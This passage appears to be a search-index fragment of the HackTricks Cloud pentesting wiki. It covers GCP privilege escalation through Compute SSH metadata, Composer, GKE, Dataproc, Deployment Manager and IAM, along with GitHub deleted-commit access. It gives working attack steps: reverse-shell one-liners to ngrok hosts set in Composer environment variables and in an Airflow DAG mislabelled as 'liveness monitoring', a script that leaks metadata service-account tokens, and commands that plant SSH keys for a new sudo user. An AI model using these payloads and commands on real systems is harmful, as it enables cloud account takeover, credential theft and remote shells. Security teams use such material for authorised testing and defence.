compute.snapshots.setIamPolicy","id":"1034","title":"compute.snapshots.setIamPolicy"},"1035":{"body":"Grant yourself extra permissions to a disk.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.disks.setIamPolicy","id":"1035","title":"compute.disks.setIamPolicy"},"1036":{"body":"Following this link you find some ideas to try to bypass access scopes .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » Bypass Access Scopes","id":"1036","title":"Bypass Access Scopes"},"1037":{"body":"GCP - local privilege escalation ssh pivoting","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » Local Privilege Escalation in GCP Compute instance","id":"1037","title":"Local Privilege Escalation in GCP Compute instance"},"1038":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » References","id":"1038","title":"References"},"1039":{"body":"Reading time: 5 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » GCP - Add Custom SSH Metadata","id":"1039","title":"GCP - Add Custom SSH Metadata"},"104":{"body":"If the commit ID (sha-1) value is known it\'s possible to access it in https://github.com///commit/","breadcrumbs":"Github Security » Accessible Deleted Data in Github » Directly accessing the commit","id":"104","title":"Directly accessing the commit"},"1040":{"body":"Metadata modification on an instance could lead to significant security risks if an attacker gains the necessary permissions .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » Modifying the metadata","id":"1040","title":"Modifying the metadata"},"1041":{"body":"On GCP, Linux systems often execute scripts from the Python Linux Guest Environment for Google Compute Engine . A critical component of this is the accounts daemon , which is designed to regularly check the instance metadata endpoint for updates to the authorized SSH public keys . Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and integrated into the local system . The key will be added into ~/.ssh/authorized_keys file of an existing user or potentially creating a new user with sudo privileges , depending on the key\'s format. And the attacker will be able to compromise the host.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » Incorporation of SSH Keys into Custom Metadata","id":"1041","title":"Incorporation of SSH Keys into Custom Metadata"},"1042":{"body":"Examine Existing SSH Keys on the Instance: Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under metadata, specifically the ssh-keys key. gcloud compute instances describe [INSTANCE] --zone [ZONE] Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. Prepare a Text File for SSH Key Metadata: Save the details of usernames and their corresponding SSH keys into a text file named meta.txt. This is essential for preserving the existing keys while adding new ones. Generate a New SSH Key for the Target User (alice in this example): Use the ssh-keygen command to generate a new SSH key, ensuring that the comment field (-C) matches the target username. ssh-keygen -t rsa -C \\"alice\\" -f ./key -P \\"\\" && cat ./key.pub Add the new public key to meta.txt, mimicking the format found in the instance\'s metadata. Update the Instance\'s SSH Key Metadata: Apply the updated SSH key metadata to the instance using the gcloud compute instances add-metadata command. gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt Access the Instance Using the New SSH Key: Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (alice in this example). ssh -i ./key alice@localhost\\nsudo id","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » Add SSH key to existing privileged user","id":"1042","title":"Add SSH key to existing privileged user"},"1043":{"body":"If no interesting user is found, it\'s possible to create a new one which will be given sudo privileges: bash # define the new account username\\nNEWUSER=\\"definitelynotahacker\\" # create a key\\nssh-keygen -t rsa -C \\"$NEWUSER\\" -f ./key -P \\"\\" # create the input meta file\\nNEWKEY=\\"$(cat ./key.pub)\\"\\necho \\"$NEWUSER:$NEWKEY\\" > ./meta.txt # update the instance metadata\\ngcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt # ssh to the new account\\nssh -i ./key \\"$NEWUSER\\"@localhost","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » Create a new privileged user and add a SSH key","id":"1043","title":"Create a new privileged user and add a SSH key"},"1044":{"body":"It\'s possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by applying SSH keys at the project level . This approach allows SSH access to any instance within the project that hasn\'t explicitly blocked project-wide SSH keys. Here\'s a summarized guide: Apply SSH Keys at the Project Level: Use the gcloud compute project-info add-metadata command to add SSH keys from meta.txt to the project\'s metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the \\"Block project-wide SSH keys\\" option enabled. gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt SSH into Instances Using Project-Wide Keys: With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. A direct method to SSH into an instance is using the gcloud compute ssh [INSTANCE] command. This command uses your current username and the SSH keys set at the project level to attempt access.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » SSH keys at project level","id":"1044","title":"SSH keys at project level"},"1045":{"body":"https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » References","id":"1045","title":"References"},"1046":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » GCP - Composer Privesc","id":"1046","title":"GCP - Composer Privesc"},"1047":{"body":"More info in: GCP - Composer Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » composer","id":"1047","title":"composer"},"1048":{"body":"It\'s possible to attach any service account to the newly create composer environment with that permission. Later you could execute code inside composer to steal the service account token. bash gcloud composer environments create privesc-test \\\\ --project \\"${PROJECT_ID}\\" \\\\ --location europe-west1 \\\\ --service-account=\\"${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com\\" More info about the exploitation here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » composer.environments.create","id":"1048","title":"composer.environments.create"},"1049":{"body":"It\'s possible to update composer environment, for example, modifying env variables: bash # Even if it says you don\'t have enough permissions the update happens\\ngcloud composer environments update \\\\ projects//locations//environments/ \\\\ --update-env-variables=\\"PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c \'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1\' & #%s\\" \\\\ --location \\\\ --project # Call the API endpoint directly\\nPATCH /v1/projects//locations//environments/?alt=json&updateMask=config.software_config.env_variables HTTP/2\\nHost: composer.googleapis.com\\nUser-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)\\nAccept-Encoding: gzip, deflate, br\\nAccept: application/json\\nContent-Length: 178\\nContent-Type: application/json\\nX-Goog-Api-Client: cred-type/sa\\nAuthorization: Bearer [token]\\nX-Allowed-Locations: 0x0 {\\"config\\": {\\"softwareConfig\\": {\\"envVariables\\": {\\"BROWSER\\": \\"/bin/bash -c \'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1\' & #%s\\", \\"PYTHONWARNINGS\\": \\"all:0:antigravity.x:0:0\\"}}}} TODO: Get RCE by adding new pypi packages to the environment","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » composer.environments.update","id":"1049","title":"composer.environments.update"},"105":{"body":"It\'s the same to access both of these: https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14 https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463 And the latest one use a short sha-1 that is bruteforceable.","breadcrumbs":"Github Security » Accessible Deleted Data in Github » Brute-forcing short SHA-1 values","id":"105","title":"Brute-forcing short SHA-1 values"},"1050":{"body":"Check the source code of the dags being executed: bash mkdir /tmp/dags\\ngcloud composer environments storage dags export --environment --location --destination /tmp/dags","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Download Dags","id":"1050","title":"Download Dags"},"1051":{"body":"Add the python DAG code into a file and import it running: bash # TODO: Create dag to get a rev shell\\ngcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py Reverse shell DAG: reverse_shell.py import airflow\\nfrom airflow import DAG\\nfrom airflow.operators.bash_operator import BashOperator\\nfrom datetime import timedelta default_args = { \'start_date\': airflow.utils.dates.days_ago(0), \'retries\': 1, \'retry_delay\': timedelta(minutes=5)\\n} dag = DAG( \'reverse_shell\', default_args=default_args, description=\'liveness monitoring dag\', schedule_interval=\'*/10 * * * *\', max_active_runs=1, catchup=False, dagrun_timeout=timedelta(minutes=10),\\n) # priority_weight has type int in Airflow DB, uses the maximum.\\nt1 = BashOperator( task_id=\'bash_rev\', bash_command=\'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1\', dag=dag, depends_on_past=False, priority_weight=2**31 - 1, do_xcom_push=False)","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Import Dags","id":"1051","title":"Import Dags"},"1052":{"body":"All the components of a composer environments (DAGs, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and whenever a DAG is created or updated, submit a backdoored version so the composer environment will get from the storage the backdoored version. Get more info about this attack in: GCP - Storage Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Write Access to the Composer bucket","id":"1052","title":"Write Access to the Composer bucket"},"1053":{"body":"TODO: Check what is possible to compromise by uploading plugins","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Import Plugins","id":"1053","title":"Import Plugins"},"1054":{"body":"TODO: Check what is possible to compromise by uploading data tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Import Data","id":"1054","title":"Import Data"},"1055":{"body":"Reading time: 5 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » GCP - Container Privesc","id":"1055","title":"GCP - Container Privesc"},"1056":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container","id":"1056","title":"container"},"1057":{"body":"This permission allows to gather credentials for the Kubernetes cluster using something like: bash gcloud container clusters get-credentials --zone Without extra permissions, the credentials are pretty basic as you can just list some resource , but hey are useful to find miss-configurations in the environment. note Note that kubernetes clusters might be configured to be private , that will disallow that access to the Kube-API server from the Internet. If you don\'t have this permission you can still access the cluster, but you need to create your own kubectl config file with the clusters info. A new generated one looks like this: yaml apiVersion: v1\\nclusters: - cluster: certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0lRRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzWVdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpFeE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSWh2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5WndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDVtbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3FsRTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmMwbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJTkRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1NsZ01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVlZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ05WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WSFE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZjTkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U1lPdWVQUHNrODVvdWEwREpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVndmNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSVNqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZaGxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1ZvQzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUGs4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4QUV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZjUT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K server: https://34.123.141.28 name: gke_security-devbox_us-central1_autopilot-cluster-1\\ncontexts: - context: cluster: gke_security-devbox_us-central1_autopilot-cluster-1 user: gke_security-devbox_us-central1_autopilot-cluster-1 name: gke_security-devbox_us-central1_autopilot-cluster-1\\ncurrent-context: gke_security-devbox_us-central1_autopilot-cluster-1\\nkind: Config\\npreferences: {}\\nusers: - name: gke_security-devbox_us-central1_autopilot-cluster-1 user: auth-provider: config: access-token: cmd-args: config config-helper --format=json cmd-path: gcloud expiry: \\"2022-12-06T01:13:11Z\\" expiry-key: \\"{.credential.token_expiry}\\" token-key: \\"{.credential.access_token}\\" name: gcp","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.clusters.get","id":"1057","title":"container.clusters.get"},"1058":{"body":"Kubernetes by default prevents principals from being able to create or update Roles and ClusterRoles with more permissions that the ones the principal has. However, a GCP principal with that permissions will be able to create/update Roles/ClusterRoles with more permissions that ones he held, effectively bypassing the Kubernetes protection against this behaviour. container.roles.create and/or container.roles.update OR container.clusterRoles.create and/or container.clusterRoles.update respectively are also necessary to perform those privilege escalation actions.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.roles.escalate | container.clusterRoles.escalate","id":"1058","title":"container.roles.escalate | container.clusterRoles.escalate"},"1059":{"body":"Kubernetes by default prevents principals from being able to create or update RoleBindings and ClusterRoleBindings to give more permissions that the ones the principal has. However, a GCP principal with that permissions will be able to create/update RolesBindings/ClusterRolesBindings with more permissions that ones he has, effectively bypassing the Kubernetes protection against this behaviour. container.roleBindings.create and/or container.roleBindings.update OR container.clusterRoleBindings.create and/or container.clusterRoleBindings.update respectively are also necessary to perform those privilege escalation actions.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.roles.bind | container.clusterRoles.bind","id":"1059","title":"container.roles.bind | container.clusterRoles.bind"},"106":{"body":"https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"Github Security » Accessible Deleted Data in Github » References","id":"106","title":"References"},"1060":{"body":"All these permissions are going to allow you to create or update a resource where you can define a pod . Defining a pod you can specify the SA that is going to be attached and the image that is going to be run , therefore you can run an image that is going to exfiltrate the token of the SA to your server allowing you to escalate to any service account. For more information check: As we are in a GCP environment, you will also be able to get the nodepool GCP SA from the metadata service and escalate privileges in GC P (by default the compute SA is used).","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.cronJobs.create | container.cronJobs.update | container.daemonSets.create | container.daemonSets.update | container.deployments.create | container.deployments.update | container.jobs.create | container.jobs.update | container.pods.create | container.pods.update | container.replicaSets.create | container.replicaSets.update | container.replicationControllers.create | container.replicationControllers.update | container.scheduledJobs.create | container.scheduledJobs.update | container.statefulSets.create | container.statefulSets.update","id":"1060","title":"container.cronJobs.create | container.cronJobs.update | container.daemonSets.create | container.daemonSets.update | container.deployments.create | container.deployments.update | container.jobs.create | container.jobs.update | container.pods.create | container.pods.update | container.replicaSets.create | container.replicaSets.update | container.replicationControllers.create | container.replicationControllers.update | container.scheduledJobs.create | container.scheduledJobs.update | container.statefulSets.create | container.statefulSets.update"},"1061":{"body":"As explained in this page , with these permissions you can read the tokens of all the SAs of kubernetes , so you can escalate to them.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.secrets.get | container.secrets.list","id":"1061","title":"container.secrets.get | container.secrets.list"},"1062":{"body":"With this permission you will be able to exec into pods , which gives you access to all the Kubernetes SAs running in pods to escalate privileges within K8s, but also you will be able to steal the GCP Service Account of the NodePool , escalating privileges in GCP .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.pods.exec","id":"1062","title":"container.pods.exec"},"1063":{"body":"As explained in this page , with these permissions you can access local services running in pods that might allow you to escalate privileges in Kubernetes (and in GCP if somehow you manage to talk to the metadata service) .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.pods.portForward","id":"1063","title":"container.pods.portForward"},"1064":{"body":"Because of the name of the permission , it looks like that it will allow you to generate tokens of the K8s Service Accounts , so you will be able to privesc to any SA inside Kubernetes. However, I couldn\'t find any API endpoint to use it, so let me know if you find it.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.serviceAccounts.createToken","id":"1064","title":"container.serviceAccounts.createToken"},"1065":{"body":"These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to persist in the cluster . For more information follow this link . tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.mutatingWebhookConfigurations.create | container.mutatingWebhookConfigurations.update","id":"1065","title":"container.mutatingWebhookConfigurations.create | container.mutatingWebhookConfigurations.update"},"1066":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » GCP Dataproc Privilege Escalation","id":"1066","title":"GCP Dataproc Privilege Escalation"},"1067":{"body":"GCP - Dataproc Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » Dataproc","id":"1067","title":"Dataproc"},"1068":{"body":"I was unable to get a reverse shell using this method, however it is possible to leak SA token from the metadata endpoint using the method described below. Steps to exploit Place the job script on the GCP Bucket Submit a job to a Dataproc cluster. Use the job to access the metadata server. Leak the service account token used by the cluster. python import requests metadata_url = \\"http://metadata/computeMetadata/v1/instance/service-accounts/default/token\\"\\nheaders = {\\"Metadata-Flavor\\": \\"Google\\"} def fetch_metadata_token(): try: response = requests.get(metadata_url, headers=headers, timeout=5) response.raise_for_status() token = response.json().get(\\"access_token\\", \\"\\") print(f\\"Leaked Token: {token}\\") return token except Exception as e: print(f\\"Error fetching metadata token: {e}\\") return None if __name__ == \\"__main__\\": fetch_metadata_token() bash # Copy the script to the storage bucket\\ngsutil cp gs:/// # Submit the malicious job\\ngcloud dataproc jobs submit pyspark gs:/// \\\\ --cluster= \\\\ --region= tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get","id":"1068","title":"dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get"},"1069":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » GCP - Deploymentmaneger Privesc","id":"1069","title":"GCP - Deploymentmaneger Privesc"},"107":{"body":"Reading time: 18 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"Github Security » Basic Github Information » Basic Github Information","id":"107","title":"Basic Github Information"},"1070":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager","id":"1070","title":"deploymentmanager"},"1071":{"body":"This single permission lets you launch new deployments of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. You could actually launch any resource listed in gcloud deployment-manager types list In the original research following script is used to deploy a compute instance, however that script won\'t work. Check a script to automate the creation, exploit and cleaning of a vuln environment here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.create","id":"1071","title":"deploymentmanager.deployments.create"},"1072":{"body":"This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful) Check a script to automate the creation, exploit and cleaning of a vuln environment here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.update","id":"1072","title":"deploymentmanager.deployments.update"},"1073":{"body":"This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous deploymentmanager.deployments.create section.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.setIamPolicy","id":"1073","title":"deploymentmanager.deployments.setIamPolicy"},"1074":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » References","id":"1074","title":"References"},"1075":{"body":"Reading time: 9 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » GCP - IAM Privesc","id":"1075","title":"GCP - IAM Privesc"},"1076":{"body":"Find more information about IAM in: GCP - IAM, Principals & Org Policies Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » IAM","id":"1076","title":"IAM"},"1077":{"body":"An attacker with the mentioned permissions will be able to update a role assigned to you and give you extra permissions to other resources like: bash gcloud iam roles update --project --add-permissions You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.roles.update 